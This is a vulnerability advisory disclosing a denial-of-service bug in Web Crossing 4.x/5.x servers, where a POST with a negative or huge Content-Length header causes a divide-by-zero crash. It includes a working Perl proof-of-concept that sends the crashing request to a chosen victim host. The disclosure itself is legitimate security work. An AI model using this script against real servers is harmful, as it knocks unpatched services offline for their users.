webxdos.txt

`Web Crossing 4.x/5.x Denial of Service Vulnerability  
  
###################################################  
  
Credit:  
Author : Peter Winter-Smith  
  
Software:  
Package : Web Crossing  
Versions : 4.x/5.x  
Vendor : WebCrossing, Inc.  
Vendor Url : http://www.webcrossing.com/  
  
Vulnerability:  
Bug Type : Denial of Service  
Severity : Less Critical  
  
  
1. Description of Software  
  
"Web Crossing is the world's leading collaboration server platform,  
offering complete solutions including discussion groups/bulletin boards,  
integrated newsgroups and mailing lists, full email services, calendar  
services, real-time chats, live events and full web application  
programming features, complete cross-platform compatibility, and  
distributed/mirrored serving for ultimate scaleability."  
- Vendors Description  
  
  
2. Bug Information  
  
(a). Denial of Service  
  
When an HTTP POST request is made to Web Crossing's built-in server  
application (default port 80/tcp), if the 'Content-Length' header supplied  
with the request is an extremely large or negative number, the server  
will encounter a set of instructions which lead to an integer-divide-by-  
zero problem, immediately crashing the server and denying any further  
service.  
  
The offending instruction is located at 0090121F:  
  
  
0090121F F7F9 IDIV ECX  
  
  
  
3. Proof of Concept  
  
The following perl script should crash any Web Crossing BBS using the  
built-in server application for hosting:  
  
  
#########################################################################  
#!/usr/bin/perl -w  
#  
# Web Crossing 4.x\5.x Denial of Service Exploit  
# [ Bad 'Content-Length' Header Bug ]  
#  
# - by Peter Winter-Smith [[email protected]]  
  
use IO::Socket;  
  
if(!($ARGV[0]))  
{  
print "Usage: wxdos.pl <victim>\n";  
exit;  
}  
  
print "Web Crossing 4.x\\5.x Denial of Service Exploit\n" .  
"\t[ Bad 'Content-Length' Header Bug ]\n" .  
"\t[peter4020\@hotmail.com]\n\n";  
  
$victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0],  
PeerPort=>"80")  
or die "Unable to connect to $ARGV[0] on " .  
"port 80";  
  
  
$DoS = "POST / HTTP/1.1\r\n" .  
"Content-Length: -1\r\n\r\n";  
  
print $victim $DoS;  
  
print "[+] Evil request made to target server ... Waiting...!\n";  
  
sleep(4);  
  
close($victim);  
  
print "[+] Done!\n";  
exit;  
#########################################################################  
  
  
4. Patches - Workarounds  
  
Although I was able to contact the Web Crossing support staff, when the  
investigation into this flaw was handed over to the development team all  
contact was lost with both them and the support staff and my emails were  
no-longer answered. I have decided to release this information so that  
users of Web Crossing can decide what would be a suitable course of action  
for protecting their systems from this bug.  
  
No vendor supplied patches exist, I would recommend that filtering of the  
'Content-Length' header is put into action via some third party  
application if at all possible.  
  
  
5. Credits  
  
The discovery, analysis and exploitation of this flaw is a result of  
research carried out by Peter Winter-Smith. I would ask that you do not  
regard any of the analysis to be 'set in stone', and that if investigating  
this flaw you back trace the steps detailed earlier for yourself.  
  
Greets and thanks to:  
David and Mark Litchfield, JJ Gray (Nexus), Todd and all the  
packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)),  
pv8man, nick k., Joel J. and Martine.  
  
o This document should be mirrored at  
http://www.elitehaven.net/webxdos.txt  
  
_________________________________________________________________  
Sign-up for a FREE BT Broadband connection today!   
http://www.msn.co.uk/specials/btbroadband  
`